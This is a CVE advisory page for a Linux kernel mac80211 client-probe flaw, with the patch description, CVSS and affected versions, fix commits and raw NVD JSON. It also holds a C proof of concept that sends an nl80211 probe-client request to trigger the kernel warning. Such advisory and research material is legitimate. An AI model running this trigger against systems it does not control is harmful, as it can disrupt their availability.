Security Vulnerability Report
CVE-2023-53588 CVSS 5.5 MEDIUM

CVE-2023-53588

Published: 2025-10-04 16:15:55
Last Modified: 2026-03-23 18:36:24
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

wifi: mac80211: check for station first in client probe

When probing a client, first check if we have it, and then check for the channel context; otherwise you can trigger the warning there easily by probing when the AP isn't even started yet. Since a client existing means the AP is also operating, we can then keep the warning.

Also simplify the moved code a bit.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (versions from 3.8 up to, excluding, 6.1.55) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (versions from 6.2 up to, excluding, 6.5.5) - VULNERABLE
Linux Kernel < 6.6 (fix commit: 67dfa589aa8806c7959cbca2f4613b8d41c75a06)
Linux Kernel stable branch (fix commit: 7dce2deb0b03aaf46c87ceedea81ef4153e26c40)
Linux Kernel stable branch (fix commit: 7e1cda5cf07f848e6b50b4e5e7761ffbce905a3d)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
C
/*
 * CVE-2023-53588 PoC - Linux Kernel mac80211 client probe vulnerability
 *
 * This PoC demonstrates how to trigger the vulnerability by performing
 * a client probe before the AP is started.
 *
 * Note: this requires a wireless card supported by mac80211 drivers and
 * links against libnl-3 / libnl-genl-3.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <linux/nl80211.h>
#include <netlink/netlink.h>
#include <netlink/genl/genl.h>
#include <netlink/genl/ctrl.h>

static int nl80211_trigger_probe(struct nl_sock *sk, int ifindex)
{
    struct nl_msg *msg;
    int family;
    int ret;
    /* Broadcast address: no station entry can match it, so on an unpatched
     * kernel the request reaches the channel-context check while no AP runs. */
    unsigned char target_mac[6] = {0xff, 0xff, 0xff, 0xff, 0xff, 0xff};

    /* Resolve the nl80211 generic netlink family id */
    family = genl_ctrl_resolve(sk, "nl80211");
    if (family < 0) {
        fprintf(stderr, "Failed to resolve nl80211 family: %d\n", family);
        return -1;
    }

    /* Create netlink message for the client probe */
    msg = nlmsg_alloc();
    if (!msg) {
        fprintf(stderr, "Failed to allocate netlink message\n");
        return -1;
    }

    /* Set message header - NL80211_CMD_PROBE_CLIENT */
    if (!genlmsg_put(msg, NL_AUTO_PORT, NL_AUTO_SEQ, family, 0, 0,
                     NL80211_CMD_PROBE_CLIENT, 0)) {
        fprintf(stderr, "Failed to build generic netlink header\n");
        nlmsg_free(msg);
        return -1;
    }

    /* Interface index and target MAC address attributes (both required
     * by NL80211_CMD_PROBE_CLIENT) */
    nla_put_u32(msg, NL80211_ATTR_IFINDEX, ifindex);
    nla_put(msg, NL80211_ATTR_MAC, 6, target_mac);

    /* Send the message - this should trigger the warning
     * because the AP is not started yet (no channel context) */
    ret = nl_send_auto(sk, msg);
    if (ret < 0) {
        fprintf(stderr, "Failed to send netlink message: %d\n", ret);
    } else {
        printf("Probe message sent successfully\n");
        printf("Check dmesg for kernel warning if vulnerable\n");
    }

    nlmsg_free(msg);
    return ret;
}

int main(int argc, char *argv[])
{
    struct nl_sock *sk;
    int ifindex = 0; /* Interface index of the wireless device */

    if (argc < 2) {
        fprintf(stderr, "Usage: %s <interface_index>\n", argv[0]);
        fprintf(stderr, "Example: %s 3\n", argv[0]);
        return 1;
    }
    ifindex = atoi(argv[1]);

    /* Allocate netlink socket */
    sk = nl_socket_alloc();
    if (!sk) {
        fprintf(stderr, "Failed to allocate netlink socket\n");
        return 1;
    }

    /* Connect to generic netlink */
    if (genl_connect(sk) < 0) {
        fprintf(stderr, "Failed to connect to generic netlink\n");
        nl_socket_free(sk);
        return 1;
    }

    printf("Attempting to trigger CVE-2023-53588...\n");
    printf("Interface index: %d\n", ifindex);
    printf("Make sure AP mode is NOT started on this interface\n");

    /* Trigger the vulnerability */
    nl80211_trigger_probe(sk, ifindex);

    /* Cleanup */
    nl_socket_free(sk);
    printf("Done. Check 'dmesg' for kernel warnings.\n");
    return 0;
}

References

https://git.kernel.org/stable/c/67dfa589aa8806c7959cbca2f4613b8d41c75a06 (Patch)
https://git.kernel.org/stable/c/7dce2deb0b03aaf46c87ceedea81ef4153e26c40 (Patch)
https://git.kernel.org/stable/c/7e1cda5cf07f848e6b50b4e5e7761ffbce905a3d (Patch)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2023-53588",
    "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "published": "2025-10-04T16:15:55.200",
    "lastModified": "2026-03-23T18:36:24.410",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: mac80211: check for station first in client probe\n\nWhen probing a client, first check if we have it, and then\ncheck for the channel context, otherwise you can trigger\nthe warning there easily by probing when the AP isn't even\nstarted yet. Since a client existing means the AP is also\noperating, we can then keep the warning.\n\nAlso simplify the moved code a bit."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
            "baseScore": 5.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "LOCAL",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 1.8,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "NVD-CWE-noinfo"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "3.8",
                "versionEndExcluding": "6.1.55",
                "matchCriteriaId": "F0087966-6BC7-441B-81DC-701E50DB7659"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "6.2",
                "versionEndExcluding": "6.5.5",
                "matchCriteriaId": "8CF71E85-DA24-4925-95C5-E5C15DA71AE6"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {"url": "https://git.kernel.org/stable/c/67dfa589aa8806c7959cbca2f4613b8d41c75a06", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]},
      {"url": "https://git.kernel.org/stable/c/7dce2deb0b03aaf46c87ceedea81ef4153e26c40", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]},
      {"url": "https://git.kernel.org/stable/c/7e1cda5cf07f848e6b50b4e5e7761ffbce905a3d", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}
    ]
  }
}